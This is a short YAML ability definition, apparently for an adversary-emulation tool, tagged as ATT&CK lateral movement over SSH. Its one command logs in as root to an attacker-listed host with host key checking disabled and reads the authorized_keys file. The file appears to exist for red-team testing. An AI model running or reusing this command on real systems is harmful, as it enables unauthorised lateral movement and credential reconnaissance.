- id: 40000000-0000-0000-0000-000000000002
  name: SSH Connection
  description: Shell SSH connection.
  tactic: lateral-movement
  technique: { attack_id: T1021.004, name: "Remote Services: SSH" }
  repeatable: false
  singleton: true
  platforms:
    linux: { sh: { command: 'sleep $W402 && ssh -p 4222 -o StrictHostKeyChecking=no root@$(cat $DATA_PATH/KC4/attackaddr) "cat ~/.ssh/authorized_keys"', timeout: 900, parsers: [], cleanup: "" } }